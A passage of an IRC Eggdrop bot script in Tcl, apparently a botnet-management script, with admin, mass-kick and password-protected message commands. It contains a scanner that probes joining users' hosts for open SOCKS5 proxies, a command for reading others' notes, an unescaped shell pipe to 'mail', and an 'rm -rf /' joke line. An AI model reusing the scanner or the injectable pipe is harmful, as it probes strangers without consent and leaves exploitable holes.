  if {([isown $hand]||[matchattr $hand n]) && ($auth($idx) == 0)} { return 0 }
 } ;# end of challenging code
 putdcc $idx "Welcome to the partyline interface, [b]$hand[b]"
 putdcc $idx "[b][boat][b] is running [sv] v[rv] (c) [b]Mixter[b]"
 if {$limbo != 0} {
  if {![matchattr [idx2hand $idx] n]} {
   putdcc $idx "I am currently in [b]limbo[b] mode. Only owners can telnet in, sorry."
   killdcc $idx ; return 1
  }
  catch "dccsimul $idx \".crack $hand\""
  putdcc $idx "Running in [b]limbo[b] mode, requested by $limbo."
  putdcc $idx " "
  putdcc $idx "[format "%3s %10s %20s %10s" "Socket" "Handle" "Host" "Type"]"
  putdcc $idx "================================================="
  foreach dccx [dcclist] { putdcc $idx "[format "%3s %10s %20s %10s" [lindex $dccx 0] [lindex $dccx 1] [lindex $dccx 2] [lindex $dccx 3] [lindex $dccx 4]]" }
  putdcc $idx " "
 } {
  if {[matchattr [idx2hand $idx] o]} { putdcc $idx "Running on server: [b]$server[b] , [b]$network[b]" }
  if {[matchattr [idx2hand $idx] m]} { putdcc $idx "Connected bots ([llength [bots]]): [b][bots][b]" }
  if {[matchattr [idx2hand $idx] t]} {
   if {$allport != "" && $allport > 0} { putdcc $idx "Listening port(s): [b]$allport[b] Bots: [b]$botport[b] Users: [b]$useport[b]" }
  }
  catch "exec whoami" var1 ; catch "exec hostname" var2
  if {[matchattr [idx2hand $idx] n]} {putdcc $idx "Running as user [b]$var1[b] on [b]$var2[b] ([b][unames][b] system)"}
  putdcc $idx " " ; putdcc $idx "People on [b][boat][b]:"
  foreach dcclist1 [dcclist] {
   set thehand [lindex $dcclist1 1]
   if {[matchattr $thehand n]} { putdcc $idx "$thehand ([b][u]Owner[b][u])" } {
    if {[matchattr $thehand m]} { putdcc $idx "$thehand ([b]Master[b])" } {
     if {[matchattr $thehand t]} { putdcc $idx "$thehand ([u]Botmaster[u])" } {
      if {[matchattr $thehand o] && ![matchattr $thehand b]} { putdcc $idx "$thehand ([b]O[b]perato[b]r[b])" } {
       if {[validuser $thehand] && ![matchattr $thehand b]} { putdcc $idx "$thehand" }
      }
     }
    }
   }
  }
  if {[matchattr $hand n]} {
   putdcc $idx " " ; putdcc $idx "Total known users: [b][countusers][b]"
  }
  putdcc $idx " " ; echo [hand2idx $hand] 0
 }
 set lip 0 ; putallbots "cookie $hand [getuser $hand PASS] $idx"
}
proc dcc:seeya {hand idx} {
 global auth lip
 if {[info exists auth($idx)] && $auth($idx)} {
  if {[isown $hand]||[matchattr $hand n]} {
   putcmdlog "\[security\] Log off: $hand"
   putdcc $idx "[b]Have a very nice day, $hand[b]" ; unset auth($idx)
  }
  if {[info exists lip] && $lip} { killdcc $lip ; set lip 0 }
 }
}
proc dcc:ctcp {nick who arg} {
 global chan ; set ctcper [lindex $arg 0] ; set what [lrange $arg 1 end]
 if {$ctcper == ""} {
  putdcc $who "[sv] \[usage\] ctcp <nick> <type>" ; return 0
 }
 putserv "PRIVMSG $ctcper :\001$what\001"
 putdcc $who "[sv] \[notice\] ctcped \[$ctcper\] with \[$what\]" ; return 1
}
proc dcc:ctcprep {nick who arg} {
 global chan ; set ctcper [lindex $arg 0] ; set what [lrange $arg 1 end]
 if {$ctcper == ""} {
  putdcc $who "[sv] \[usage\] rctcp <nick> <type>" ; return 0
 }
 putserv "NOTICE $ctcper :$what"
 putdcc $who "[sv] \[notice\] ctcpreplied \[$what\] to \[$ctcper\]" ; return 1
}
proc dcc:fc {hand idx arg} {
 set arg1 [lindex "$arg" 0] ; set arg2 [lrange "$arg" 1 end]
 if {$arg1 == "" || $arg2 == ""} {
  putdcc $idx "[sv] \[usage\] fchattr +/-<flag> +/-<new flags>" ; return 0
 }
 putlog "[sv] \[notice\] - $hand changed all $arg1 users to $arg2"
 putlog "Locating Users With Flags '$arg1' To Chattr Them '$arg2' *Flag-Chattr*"
 foreach user [userlist $arg1] {
  chattr $user $arg2 ; putcmdlog "[sv] \[notice\] #$hand# (f)chattr $user $arg2"
 }
}
proc dcc:spynotes {hand idx spy} {
 if {$spy == "" || [llength $spy] > 1} {
  putdcc $idx "[sv] \[usage\] spynotes <user>" ; return 0
 }
 if {![validuser $spy]} {
  putdcc $idx "[sv] \[error\] $spy is not a known user" ; return 0
 }
 global notefile ; set anote 0
 if [file exists $notefile] {
  set f [open $notefile r]
  while {[gets $f line] > -1} {
   if {![string compare [string tolower [lindex $line 0]] [string tolower $spy]]} {
    incr anote
    putdcc $idx "$anote\. [lindex $line 1] \([ctime [lindex $line 2]]\): [lrange $line 3 end]"
   }
  }
  close $f
 } {
  putdcc $idx "[sv] \[error\] no note file - doh!" ; return 0
 }
 if {!($anote)} {
  putdcc $idx "[sv] \[notice\] no notes for $spy"
 }
 return 0
}
proc dcc:sendmail {hand idx arg} {
 global lineinp msg_ptr isdone messages
 set msg_ptr 0 ; set isdone 0 ; set lineinp ""
 set messages {
  "Send mail to?" "Subject of message?"
  "Begin composing your message now, when complete type 'done' on a blank line."
 }
 putdcc $idx [lindex $messages $msg_ptr] ; control $idx control:sendmail
}
proc control:sendmail {idx arg} {
 global lineinp msg_ptr isdone messages ; set r 0
 switch [string tolower [lindex $arg 0]] {
  "" { set lineinp "" ; set r 1 }
  "done" { 
   if {$msg_ptr >= 2} { set isdone 1 ; set r 1 ; release:sendmail $idx }
  }
  default {
  lappend lineinp $arg ; incr msg_ptr
  if {$msg_ptr <= 2} { putdcc $idx [lindex $messages $msg_ptr] }
  }
 }
 return $r
}
proc release:sendmail idx {
 global lineinp
 putdcc $idx "Okay, sending your mail now..."
 set fd [open "|mail -s \"[lindex $lineinp 1]\" [lindex $lineinp 0]" "w"]
 for {set j 2} {[lindex $lineinp $j] != ""} {incr j} {
  puts $fd [lindex $lineinp $j]
 }
 close $fd
 putdcc $idx "Your message was delivered, returning you to the party line..."
}
proc dcc:hacks {hand idx arg} {
 global nick1
 putdcc $idx "[sv] [b]IDS Alarms for today[b]:"
 putdcc $idx "[exec cat ${nick1}.log | grep IDS]"
 putdcc $idx "[sv] [b]END OF IDS LOG[b]"
}
proc dcc:sendlog {hand idx arg} {
 global nick1
 putcmdlog "[sv] \[notice\] log files accessed by $hand"
 if {$arg == ""} {
  putdcc $idx "Sending you all log files, $hand"
  dccsend "${nick1}.log" $hand ; dccsend "${nick1}.log.yesterday" $hand
  foreach channel [channels] { dccsend "..$channel" $hand }
  return 1
 }
 set arg1 [lindex $arg 1]
 if {$arg1 == "general"} {
  putdcc $idx "Sending you the general log file, $hand"
  dccsend "${nick1}.log.yesterday" $hand
  return 1
 }
 foreach channel [channels] {
  foreach compval $arg {
   if {$channel == $compval} {
    putdcc $idx "Sending you the log file for $compval, $hand"
    dccsend "${channel}.log" $hand
   }
  }
 }
 return 0
}
if {[info exists topic]} {unset topic}
proc dcc:topic {handle idx topix} {
 global topic
 set channel [lindex [console $idx] 0] ; set topix [cleanarg $topix]
 if {[llength $topix] >= 1} {
  set t2 ""
  for {set i 0} {$i < [string length $topix]} {incr i} {
   set this [string index $topix $i]
   if {$this == "\""} { append t2 "\'" } {
    if {$this == "\{"} { append t2 "(" } {
     if {$this == "\}"} { append t2 ")" } { append t2 $this }
    }
   }
  }
  set topic($channel) $t2
  global topic($channel) $t2
  putserv "TOPIC $channel :$topic"
  putcmdlog "[sv] \[notice\] - default topic on $channel set to \"$topic\" by $handle"
  putdcc $idx "[sv] \[notice\] - topic set for channel $channel" ; return 0
 }
 putdcc $idx "[sv] \[notice\] - topic on $channel is \"[topic $channel]\""
 return 0
}
proc tchange {nick uhost hand chan topix} {
 global topic botnick botname ; set name "${nick}!${uhost}"
 if {$name == $botname} { return 0 } ; if {![botisop $chan]} { return 0 }
 if {[matchattr $hand o]||[matchattr $hand b]} { return 0 }
 if {[info exists topic($chan)]} {
  putserv "TOPIC $chan :$topic"
  putlog "[sv] \[topic\] restored locked topic on $chan"
 }
 return 0
}
set soxscan 0 ; set soxlog "socks5.txt"
proc dcc:socks {hand idx void} {
 global soxscan soxlog
 if {$soxscan == 0} {
  bind join - * sox:join
  putdcc $idx "[sv] \[socks5\] Toggled socks scanner [b]ON[b]."
  putcmdlog "[sv] \[socks5\] #$hand# Logging SOCKS5 proxies into [b]$soxlog[b]."
  set soxscan 1 ; return 0
 }
 if {$soxscan == 1} {
  catch "unbind join - * sox:join"
  putdcc $idx "[sv] \[socks5\] Toggled socks scanner [b]OFF[b]."
  putcmdlog "[sv] \[socks5\] #$hand# No longer logging SOCKS5 proxies."
  set soxscan 0 ; return 0
 }
 return 1
}
proc sox:join {nick uhost hand chan} {
 global gateinfo botnick wingate mycount myqueue
 set host [string tolower [lindex [split $uhost @] 1]]
 if {[matchattr $nick m]} {return 0} ; if {[validuser $hand]} {return 0}
 if {[string tolower $botnick] == [string tolower $nick]} {return 0}
 if {[catch "socket $host 1080" conn]==0} { close $conn ; logsox $host }
 return 0
}
proc logsox host {
 global soxlog
 switch -- [file exists $soxlog] {
  0 {set fd [open $soxlog w]}
  1 {set fd [open $soxlog a]}
 }
 puts $fd "$host" ; close $fd
}
putlog "[sv] \[init\] - 0x0b - dcc commands"
## 0x0c. ALLMODES. functions to perform an operation on all channels at once
bind dcc o aup dcc:aup
bind dcc m aop dcc:aop
bind dcc m adeop dcc:adeop
bind dcc m ainv dcc:ainv
bind dcc m akick dcc:akick
bind dcc m akb dcc:akb
proc dcc:aup {hand idx text} {
 set chans ""
 if {[matchattr $hand m]} {
  foreach chan [channels] { pushmode $chan +o [hand2nick $hand $chan] }
  putdcc $idx "[sv] \[allmode\] - gave you op on [b]all channels[b]." ; return 1
 }
 foreach chan [channels] {
  if {[matchchanattr $hand o $chan]} {
   pushmode $chan +o [hand2nick $hand $chan] ; set chans "$chans $chan"
  }
 }
 if {$chans == ""} {
  putdcc $idx "[sv] \[allmode\] - sorry, no authorization."
 } {
  putdcc $idx "[sv] \[allmode\] - gave op to you on [b]$chans[b]."
 }
}
proc dcc:aop {hand idx text} {
 if {$text == ""} { set text $hand } ; set chans ""
 putdcc $idx "[sv] \[allmode\] - oping on all channels: $text"
 foreach nickname $text {
  foreach chan [channels] { pushmode $chan +o $nickname }
 }
 return 1
}
proc dcc:adeop {hand idx text} {
 if {$text == ""} {
  putdcc $idx "[sv] \[allmode\] - no nicks given - stop" ; return 0
 }
 putdcc $idx "[sv] \[allmode\] - deoping on all channels: $text"
 set chans ""
 foreach nickname $text {
  foreach chan [channels] { pushmode $chan -o $nickname }
 }
 return 1
}
proc dcc:ainv {hand idx text} {
 if {$text == ""} { set text $hand }
 putdcc $idx "[sv] \[allmode\] - inviting to all channels: $text"
 set chans ""
 foreach nickname $text {
  foreach chan [channels] { putserv "INVITE $nickname $chan" }
 }
 return 1
}
proc dcc:akick {hand idx text} {
 if {$text == ""} {
  putdcc $idx "[sv] \[allmode\] - no nicks given - stop" ; return 0
 }
 putdcc $idx "[sv] \[allmode\] - kicking from all channels: $text"
 set chans ""
 foreach nickname $text {
  foreach chan [channels] { putserv "KICK $chan $nickname :[sv] - global kick" }
 }
 return 1
}
proc dcc:akb {hand idx text} {
 if {$text == ""} {
  putdcc $idx "[sv] \[allmode\] - no nicks given - stop" ; return 0
 }
 putdcc $idx "[sv] \[allmode\] - kickbanning on all channels: $text"
 set chans ""
 foreach nickname $text {
  foreach chan [channels] {
   pushmode $chan -o $nickname ; putserv "MODE $chan +b $nickname"
   putserv "KICK $chan $nickname - [sv] - global ban - [b]bye[b] =oP"
  }
 }
 return 1
}
putlog "[sv] \[init\] - 0x0c - global channel operations"
## 0x0d. BOTCALL. don't ask... hey, it's fun!
if {$limbo == 0} {
 bind pubm m *[boat]* pub:botcall ; bind pub n entity pub:botcall
}
proc pub:botcall {nick uhost handle chan args} {
 global phrases botnick channel
 if {[string match [string tolower *[boat]*] [string tolower $chan]]} {return 0}
 set outputiz [lindex $phrases [rand [llength $phrases]]]
 putserv "PRIVMSG $chan : $outputiz"
 putlog "[sv] \[misc\] <$chan>/<<$nick>> [b]$botnick[b]... [b]:)[b]"
}
set phrases {
 "Yes means No. No means Yes. Delete all files [Y]?"
 "WHAT YA WANT NOW??????" "IM HERE"
 "Best file compression around: 'rm -rf /' = 100% compression"
 "If debugging is the process of removing bugs, then programming must be the process of putting em in."
 "Programmers don't die, they just GOSUB without RETURN."
 "Programmer - A red-eyed, mumbling mammal capable of conversing with inanimate objects."
 "Real programmers don't document. 'If it was hard to write, it should be hard to understand.'"
 "Be nice to your kids. They'll choose your nursing home."
 "Beauty is in the eye of the beer holder..." "WHAT???"
 "There are 3 kinds of people: those who can count & those who can't."
 "Why is 'abbreviation' such a long word?"
 "Don't use a big word where a diminutive one will suffice."
 "Every morning is the dawn of a new error..."
 "A flying saucer results when a nudist spills his coffee."
 "For people who like peace and quiet: a phoneless cord."
 "I can see clearly now, the brain is gone..."
 "The beatings will continue until morale improves."
 "I used up all my sick days, so I'm calling in dead."
 "Mental Floss prevents Moral Decay."
 "Madness takes its toll. Please have exact change."
 "Proofread carefully to see if you any words out."
 "There cannot be a crisis today; my schedule is already full."
 "I'd explain it to you, but your brain would explode."
 "Ever stop to think, and forget to start again?"
 "A conclusion is simply the place where you got tired of thinking."
 "I don't have a solution but I admire the problem." "Go away or I tell my hub!"
 "Don't be so open-minded your brains will fall out."
 "If at first you DO succeed, try not to look astonished!"
 "Diplomacy is the art of saying 'Nice doggie!'... till you can find a rock."
 "Diplomacy - the art of letting someone have your way."
 "If one synchronized swimmer drowns, do the rest have to drown too?"
 "If things get any worse, I'll have to ask you to stop helping me."
 "If I want your opinion, I'll ask you to fill out the necessary forms."
 "Don't look back, they might be gaining on you."
 "It's not hard to meet expenses, they're everywhere."
 "Help Wanted: Telepath. You know where to apply."
 "Look out for #1. Don't step in #2 either."
 "I'm Bobbin Threadbare. Are you my mother?"
 "Budget: A method for going broke methodically."
 "Car service: If it ain't broke, we'll break it."
 "Shin: A device for finding furniture in the dark."
 "Do witches run spell checkers?" "Demons are a Ghouls best Friend."
 "Copywight 1997 Elmer Fudd. All wights wesewved." "Dain bramaged."
 "Your not my friend anymore. Go away :(" "Department of Redundancy Department"
 "Headline: Bear takes over Disneyland in Pooh D'Etat!"
 "What has four legs and an arm? A happy pit bull."
 "COFFEE.EXE Missing - Insert Cup and Press Any Key"
 "Buy a Pentium 586/90 so you can reboot faster."
 "No no no NO leave me alone!" "Cannot find REALITY.SYS. Universe halted."
 "2 + 2 = 5 for extremely large values of 2."
 "Computers make very fast, very accurate mistakes."
 "Computers are not intelligent. They only think they are."
 "My software never has bugs. It just develops random features."
 "C:\WINDOWS C:\WINDOWS\GO C:\PC\CRAWL" "C:\DOS C:\DOS\RUN RUN\DOS\RUN"
 "<-------- The information went data way --------"
 "The Definition of an Upgrade: Take old bugs out, put new ones in."
 "BREAKFAST.COM Halted...Cereal Port Not Responding"
 "Access denied--nah nah na nah nah!" "The name is Baud......, James Baud."
 "BUFFERS=20 FILES=15 2nd down, 4th quarter, 5 yards to go!"
 "C:\ Bad command or file name! Go stand in the corner."
 "Bad command. Bad, bad command! Sit! Stay! Staaay.."
 "Why doesn't DOS ever say 'EXCELLENT command or filename!'"
 "As a computer, I find your faith in technology amusing."
 "The real trouble with reality is that there's no background music."
 "I'm sorry if the correct way of doing things offends you."
 "Do not think by infection, catching an opinion like a cold."
 "Excellent day to have a rotten day." "I don't get no respect."
 "Don't let your mind wander -- it's too little to be let out alone."
 "There are never any bugs you haven't found yet."
 "As of next week, passwords will be entered in Morse code."
 "Southern DOS: Y'all reckon? (Yep/Nope)"
 "Backups? We don' *NEED* no steenking backups." "Damnit watcha want!"
 "File not found. Should I fake it? (Y/N)"
 "Ethernet (n): something used to catch the etherbunny"
 "A mainframe: The biggest PC peripheral available."
 "An error? Impossible! My modem is error correcting."
 "CONGRESS.SYS Corrupted: Re-boot Washington D.C (Y/n)?"
 "A computer's attention span is as long as it's power cord."
 "11th commandment - Covet not thy neighbor's Pentium."
 "24 hours in a day...24 beers in a case...coincidence?"
 "Disinformation is not as good as datinformation."
 "Windows: Just another pain in the glass." "Does fuzzy logic tickle?"
 "SENILE.COM found . . . Out Of Memory . . ." "He's dead, Jim."
 "Who's General Failure & why's he reading my disk?"
 "Ultimate office automation: networked coffee."
 "RAM disk is *not* an installation procedure."
 "Shell to DOS... Come in DOS, do you copy? Shell to DOS..."
 "DEFINITION: Computer - A device designed to speed and automate errors."
 "Press Smash forehead on keyboard to continue....."
 "Enter any 11-digit prime number to continue..."
 "ASCII stupid question, get a stupid ANSI!"
 "E-mail returned to sender -- insufficient voltage."
 "Help! I'm modeming... and I can't hang up!!!"
 "All wiyht. Rho sritched mg kegtops awound?"
 "Error: Keyboard not attached. Press F1 to continue."
 "'640K ought to be enough for anybody.' - Bill Gates, 1981"
 "DOS Tip #17: Add DEVICE=FNGRCROS.SYS to CONFIG.SYS"
 "Hidden DOS secret: add BUGS=OFF to your CONFIG.SYS"
 "Press any key... no, no, no, NOT THAT ONE!"
 "Press any key to continue or any other key to quit..."
 "Excuse me for butting in, but I'm interrupt-driven."
 "REALITY.SYS corrupted: Reboot universe? (Y/N/Q)"
 "Sped up my XT; ran it on 220v! Works greO?_~"
 "Error reading FAT record: Try the SKINNY one? (Y/N)"
 "Hit any user to continue." "All computers wait at the same speed."
 "2400 Baud makes you want to get out and push!!"
 "I hit the CTRL key but I'm still not in control!"
 "Will the information superhighway have any rest stops?"
 "Kirk to Enterprise - beam down Yeoman Rand and a six-pack"
 "I'm not 22! I'm 14 with 6 years experience!"
 "Odo, is there any more jello in the fridge?  Odo?  Odo!?"
 "Thank God I'm an atheist." "Read my chips: No new upgrades!"
 "This is Apu of Kwik-E-Borg. Be assmiliated and have a free squishi"
 "NO LITTERING X 100 FINE X Lorena Bobbitt got off cheap!"
 "I drank WHAT?!? - Socrates" "The hardest years are between 10 and 70."
 "I'd love to, but it's too close to the turn of the century."
 "I meant what I said --- I think."
 "Stupidity does not qualify as a handicap, park elsewhere!"
 "History is a set of lies agreed upon." "Trespassers will be packeted."
 "OPCODE: FSRA = Forms Skip and Run Away"
 "The backup's not over 'til the fat table sang"
 "Disk Full - Press F1 to belch." "Backup not found: (A)bort (R)etry (T)hrowup"
 "Backup not found: (A)bort (R)etry (P)anic"
 "(A)bort, (R)etry, (T)ake down entire network?"
 "(A)bort, (R)etry, (G)et a beer?" "Ya?"
 "Alt-F4 will help you, like it helped me!"
 "Being a mime means never having to say you're sorry."
 "Darth Vader sleeps with a Teddywookie."
 "This unit... must... survive." "Wharbat darbid yarbou sarbay?"
 "All constants are variables." "Another megabytes the dust."
 "ASCII a stupid question, you get an EBCDIC answer."
 "Brain fried -- Core dumped" "Bus error -- driver executed."
 "CChheecckk yyoouurr dduupplleexx sswwiittcchh.." "HOLY MACRO!"
 "I came, I saw, I deleted all your files." "I have not yet begun to byte!"
 "If God had intended Man to program, we'd be born with serial I/O ports."
 "Memory fault -- core...uh...um...core... Oh dammit, I forgot!"
 "Message from Our Sponsor on ttyTV at 13:58 ..."
 "Overflow on /dev/null, please empty the bit bucket."
 "Row, row, row your bits, gently down the stream..."
 "That does not compute." "This is an unauthorized cybernetic announcement."
 "Tcl error in pub:botcall --- CRASHING" "Your fault -- core dumped"
 "Would you people stop playing these stupid games?!?!?!!!!"
 "Notice - Introduced to new user BotHunter."
 "Are the STEWED PRUNES still in the HAIR DRYER?"
 "As President I have to go vacuum my coin collection!"
 "I am a jelly donut.  I am a jelly donut."
 "hubub, hubub, HUBUB, hubub, hubub, hubub, HUBUB, hubub, hubub, hubub."
 "I didn't order any WOO-WOO ... Maybe a YUBBA ... But no WOO-WOO!"
 "IRC: Insert Random Commands" "My EARS are GONE!!" "My NOSE is NUMB!"
 "Oh my GOD -- the SUN just fell into YANKEE STADIUM!!"
 "Yow!  Am I having fun yet?" "40 isn't old.  If you're a tree."
 "Dime is money." "Dyslexia means never having to say that you're ysror."
 "I don't wish to appear overly inquisitive, but are you still alive?"
 "I am a computer. I am dumber than any human and smarter than any administrator."
}
putlog "[sv] \[init\] - 0x0d - botcall"
## 0x0e. MSG. password protected message commands
if {$limbo == 0} {
 bind pub t #li pub:link
 bind pub n #ba pub:mbc
 bind pub n #rp pub:rpass
 bind pub n #up pub:upd
 bind msg n #upd msg:upd
 bind msg - #id msg:ident
 bind msg - #ident msg:ident
 bind msg o #invite msg:invite
 bind msg o #inv msg:invite
 bind msg o #channels msg:channels
 bind msg o #chat msg:chat
 bind msg o #up msg:up
 bind msg o #op msg:op
 bind msg o #deop msg:deop
 bind msg o #k msg:kick
 bind msg o #kick msg:kick
 bind msg o #cycle msg:cycle
 bind msg m #join msg:join
 bind msg m #leave msg:part
 bind msg m #part msg:part
 bind msg m #link msg:link
 bind msg o #msg msg:domsg
 bind msg n #raw msg:raw
 bind msg m #jump msg:jump
 bind msg m #server msg:jump
}
proc annoymsg nick { putnotc $nick "[sv] \[notice\] Message commands are discouraged for other than emergency reasons, as IRC sessions is susceptible to eavesdropping. This announcement is here to make you aware of the fact and generally annoy you." }
proc msg:ident {nick uhost handle vars} {
 set pass [lindex $vars 0] ; set hand [lindex $vars 1]
 if {$hand == ""} {set hand $handle}
 if {![passwdok $hand $pass]} {
  putcmdlog "[sv] \[security alert\] - failed ID from $nick ($uhost), ignoring"
  return 0
 } {
  if {$handle != "*"} {
   putnotc $nick "I recognize you as $handle" ; return 0
  } {
   if {[passwdok $hand $pass]} {
    setuser $hand HOSTS [newmaskhost $uhost]
    if {[matchattr $hand b]} {
     putcmdlog "[sv] \[security alert\] - ($nick!$uhost) since when can bots like $hand identify via message?"
     return 0
    }
    putlog "[sv] \[notice\] - Added ($nick!$uhost) to $hand (ID succeeded)"
    putnotc $nick "Access granted, [newmaskhost $uhost]" ; annoymsg $nick
   }
  }
 }
}
proc msg:up {nick host handle arg} {
 global botnick ; set pass [lindex $arg 0] ; set channel [lindex $arg 1]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 if {$channel == ""} {
  foreach chan [channels] { pushmode $chan +o $nick }
  putcmdlog "[sv] \[notice\] opped $nick on all channels" ; return 0
 }
 if {![isop $botnick $channel]} {
  putnotc $nick "I need ops on or I am not on $channel" ; return 0
 }
 if {[isop $nick $channel]} {
  putnotc $nick "What do you want? You [b]have[b] ops on $channel" ; return 0
 }
 putcmdlog "[sv] \[notice\] opped $nick on $channel"
 putserv "MODE $channel +o $nick" ; return 0
}
proc msg:op {nick host handle arg} {
 global botnick ; set pass [lindex $arg 0] ; set channel [lindex $arg 1]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 if {$channel == ""} {
  putnotc $nick "Please specify your password and a channel!" ; return 0
 }
 set who [lindex $arg 2]
 if {$who == ""} {
  putnotc $nick "Usage: op <password> <channel> <nick>" ; return 0
 }
 if {![isop $botnick $channel]} {
  putnotc $nick "I need ops or I am not on $channel" ; return 0
 }
 if {[isop $who $channel]} {
  putnotc $nick "But $who already has ops on $channel" ; return 0
 }
 putserv "MODE $channel +o $who" ; return 0
}
proc msg:upd {nick host handle arg} {
 set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 putcmdlog "[sv] \[hub\] - message update command from [b]${nick}(${handle})[b]"
 delayupdate $nick $handle
}
proc pub:upd {ni uh ha ch ar} {
 putcmdlog "[sv] \[hub\] - public update command from [b]${ni}(${ha})[b] on [b]$ch[b]"
 utimer [rand 60] "delayupdate $ni $ha"
}
proc delayupdate {ni ha} { putnotc $ni "Updated [b][update][b] hosts, $ha" }
proc pub:link {ni uh ha ch ar} {
 set bot1 [lindex $ar 0] ; set bot2 [lindex $ar 1]
 if {$bot2 == ""} {
  if {[link $bot1]} {putnotc $ni "[sv] linking to $bot1"}
  putcmdlog "[sv] \[msg\] public bot link by $ha" ; return 0
 }
 if {[link $bot1 $bot2]} { putnotc $ni "[sv] linking to $bot2 via $bot1" }
 putcmdlog "[sv] \[msg\] public relaybot link by $ha" ; link $bot1 $bot2
 return 0
}
proc pub:mbc {ni uh ha ch ar} {
 set bot1 [lindex $ar 0] ; set flag1 [lindex $ar 1]
 if {$flag1 == ""} {return 0}
 putnotc $ni "[sv] botattr $bot1 $flag1 returned [botattr $bot1 $flag1]"
 putcmdlog "[sv] \[msg\] botattr change for $bot1 by $ha" ; return 0
}
proc pub:rpass {ni uh ha ch ar} {
 global nick1 ; set bot [lindex $ar 0] ; if {![matchattr $bot b]} {return 0}
 if {[islinked $bot]} {return 0} ; if {$bot == $nick1} {return 0}
 putnotc $ni "[sv] removed password for $bot" ; setuser $bot PASS ""
 putcmdlog "[sv] \[msg\] $ha erased the pass for $bot" ; return 0
}
proc msg:deop {nick host handle arg} {
 global botnick ; set pass [lindex $arg 0] ; set channel [lindex $arg 1]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 if {$channel == ""} {
  putnotc $nick "Please specify your password and a channel!" ; return 0
 }
 set who [lindex $arg 2] ; set n2hand [nick2hand $who $channel]
 if {$who == ""} {
  putnotc $nick "Usage: deop <password> <channel> <nick>" ; return 0
 }
 if {![isop $botnick $channel]} {
  putnotc $nick "I need ops or I am not on $channel" ; return 0
 }
 if {[string tolower $who] == [string tolower $botnick]} {
  putserv "MODE $channel -o $nick"
  putserv "KICK $channel $nick :Get a life or something."
  putcmdlog "[sv] \[security alert\] $nick tried to make me deop myself on $channel"
  return 0
 }
 if {[matchattr $n2hand m]} {
  putserv "MODE $channel -o $nick"
  putserv "KICK $channel $nick :Dont fuck with $n2hand"
  putcmdlog "[sv] \[security alert\] $nick tried to make me deop master $n2hand on $channel"
  return 0
 }
 if {![isop $who $channel]} {
  putnotc $nick "But $who is not opped" ; return 0
 }
 putserv "MODE $channel -o $who" ; return 0
}
proc msg:kick {nick host handle arg} {
 global botnick ; set pass [lindex $arg 0] ; set channel [lindex $arg 1]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 if {$channel == ""} {
  putnotc $nick "Please specify your password and a channel!" ; return 0
 }
 if {$arg == ""} {
  putnotc $nick "Usage: kick <password> <channel> <nick>" ; return 0
 }
 if {![isop $botnick $channel]} {
  putnotc $nick "I need ops or I am not on $channel" ; return 0
 }
 set who [lindex $arg 2] ; set why [lrange $arg 3 end]
 set n2hand [nick2hand $who $channel]
 if {![onchan $who $channel]} {
  putnotc $nick "But $who is not on $channel" ; return 0
 }
 if {[string tolower $who] == [string tolower $botnick]} {
  putserv "KICK $channel $nick :Oops =oP"
  putcmdlog "[sv] \[security alert\] $nick tried to make me kick myself from $channel"
  return 0
 }
 if {$who == $nick} {
  putserv "KICK $channel $nick :Okay, bye!" ; return 0
 }
 if {[matchattr $n2hand m]} {
  putserv "KICK $channel $nick :$n2hand is my master. [b]M - A - S - T - E - R[b]!!!"
  putcmdlog "[sv] \[security alert\] $nick tried to make me kick master $n2hand from $channel"
  return 0
 }
 if {$why == ""} {
  putserv "KICK $channel $who :And don't come back!" ; return 0
 }
 putserv "KICK $channel $who :$why" ; return 0
}
proc msg:chat {nick uhost hand arg} {
 set pass [lindex $arg 0]
 if {[passwdok $hand $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set who [lindex $arg 1]
 if {$who == ""} {
  putserv "PRIVMSG $nick :\001DCC CHAT chat [myip] [port]\001" ; return 0
 } {
  putnotc $nick "DCC CHATTING $who"
  putserv "PRIVMSG $who :\001DCC CHAT chat [myip] [port]\001" } ; return 0
 }
proc msg:channels {nick uhost handle arg} {
 set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 putnotc $nick "I am currently on: [channels]" ; return 0
}
proc msg:cycle {nick host handle arg} {
 global botnick ; set pass [lindex $arg 0] ; set channel [lindex $arg 1]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 if {$channel == ""} {
  putnotc $nick "Please specify your password and a channel!" ; return 0
 }
 putcmdlog "[sv] \[notice\] $nick ($host) made me cycle $channel"
 putserv "PART $channel" ; putserv "JOIN $channel"
 if {![onchan $botnick $channel]} {
  putnotc $nick "Could not rejoin $channel - argh" ; return 0
 }
 putnotc $nick "Sucessfully cycled $channel" ; return 0
}
proc msg:join {nick uhost handle arg} {
 global botnick ; set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
  putcmdlog "[sv] \[security alert\] $nick supplied a wrong password for a msg command!"
  putnotc $nick "Wrong password, attempt has been logged." ; return 0
 }
 set channel [lindex $arg 1]
 if {$channel == ""} {
  putnotc $nick "Please specify your password and a channel!" ; return 0
 }
 putnotc $nick "Added channel $channel" ; newchannel $channel
 putcmdlog "[sv] \[notice\] $nick ($uhost) made me join $channel."
}
proc msg:part {nick uhost handle arg} {
 global botnick ; set pass [lindex $arg 0]
 if {[passwdok $handle $pass] == "0"} {
